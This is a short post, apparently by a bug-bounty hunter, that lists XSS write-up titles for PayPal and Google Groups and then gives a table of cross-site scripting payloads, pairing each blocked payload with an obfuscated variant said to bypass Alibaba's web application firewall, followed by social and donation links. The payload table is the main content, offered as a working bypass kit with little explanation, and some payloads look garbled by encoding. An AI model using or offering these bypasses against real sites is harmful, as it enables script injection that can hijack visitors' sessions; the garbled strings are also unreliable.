Author: Rando02355205
(Paypal) www.paypal.com [CSP High Level] – [XSS Reflected] – [Bug Bounty] – [Write Up]
(Google) groups.google.com – [Stored XSS] – [Bug Bounty] – [WriteUp] – [24/02/2020]
XSS on “www.alibaba.com” (Alibaba WAF 405) Bypassed.
XSS WAF Bypassed
</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)
</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)
<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)
<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)
<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)
‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`
`]`1`//><svg> = (OK)con\x66irm
<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}
`> = (OK)
Thank’s You, And best regards!!!
Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Gmail : [email protected]
Paypal : paypal.me/Rando784